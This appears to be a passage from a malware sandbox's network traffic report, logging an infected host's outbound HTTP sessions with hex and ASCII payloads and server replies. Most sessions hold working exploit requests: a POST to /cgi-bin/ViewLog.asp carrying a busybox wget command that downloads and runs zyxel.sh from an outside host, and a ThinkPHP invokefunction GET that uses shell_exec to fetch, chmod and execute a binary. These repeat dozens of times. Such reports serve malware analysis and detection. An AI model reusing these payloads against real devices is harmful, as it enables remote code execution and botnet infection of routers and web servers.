                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              576192.168.2.234741462.202.155.1628080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:34.460671902 CET11647OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              577192.168.2.233387631.136.82.1148080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:34.480488062 CET11649OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:35.464992046 CET11773OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:37.448808908 CET12012OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:41.640187979 CET12500OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:49.575187922 CET13508OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:05.445102930 CET15557OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:37.952862024 CET19617OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              578192.168.2.235777031.200.55.1548080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:34.493896961 CET11650OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              579192.168.2.234338894.120.159.2088080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:34.494051933 CET11651OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              58192.168.2.235138295.216.230.13880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:17.314034939 CET2207OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:17.623229027 CET2238INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:18:17 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 150
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              580192.168.2.233959085.238.204.708080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:34.496861935 CET11651OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:34.842302084 CET11753INHTTP/1.1 404 Not Found
                                                              Access-Control-Allow-Origin: *
                                                              Access-Control-Allow-Headers: Content-Type
                                                              Content-Type: text/html
                                                              Content-Length: 345
                                                              Date: Mon, 13 Nov 2023 21:19:33 GMT
                                                              Server: WebServer
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              58185.234.37.138080192.168.2.2352026
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:34.600506067 CET11653INHTTP/1.0 400 Bad Request
                                                              Server: httpd/2.0
                                                              Date: Mon, 13 Nov 2023 21:20:31 GMT
                                                              Content-Type: text/html
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              582192.168.2.233626888.198.170.2780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:34.703888893 CET11664OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:35.010801077 CET11755INHTTP/1.1 400 Bad Request
                                                              Server: nginx/1.18.0 (Ubuntu)
                                                              Date: Mon, 13 Nov 2023 21:19:34 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 166
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              583192.168.2.234690888.119.97.10380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:34.713125944 CET11699OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:35.684016943 CET11777OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              584192.168.2.234921688.255.234.9180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:34.753462076 CET11727OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:36.584858894 CET11898OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:38.824564934 CET12210OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:43.175987005 CET12730OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:51.878894091 CET13882OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:09.284578085 CET16051OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:44.095942020 CET20340OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              585192.168.2.235537288.249.59.12880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:34.753609896 CET11727OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:35.112833977 CET11759INHTTP/1.1 200 OK
                                                              Content-type: application/octet-stream
                                                              Server: uc-httpd/1.0.0
                                                              Cache-Control: max-age=864000
                                                              Connection: Close
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <html><head><title>404 File Not Found</title></head><body>The requested URL was not found on this server</body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              58695.189.103.21080192.168.2.2360320
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:34.827368975 CET11752INData Raw: 28 6e 75 6c 6c 29 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 0d 0a 44 61 74 65 3a 20 54 75 65 2c 20 31 34 20 4e 6f 76 20 32 30 32 33 20 30 30 3a 31 39 3a 33 34 20 47 4d 54 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74
                                                              Data Ascii: (null) 400 Bad RequestServer: Date: Tue, 14 Nov 2023 00:19:34 GMTX-Frame-Options: DENYX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Language: enContent-Type: text/htmlCache-Control: no-cache,no-store,max


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              587192.168.2.234085295.164.185.6180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:35.449160099 CET11772OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:35.790399075 CET11801INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:19:35 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 150
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              588192.168.2.233326295.60.210.10880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:35.487210035 CET11774OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              589192.168.2.234108895.105.136.580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:35.819936991 CET11811OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              59192.168.2.235944894.121.153.568080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:17.361757994 CET2209OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              590192.168.2.235610631.43.179.1268080
                                                              TimestampkBytes transferredDirectionData
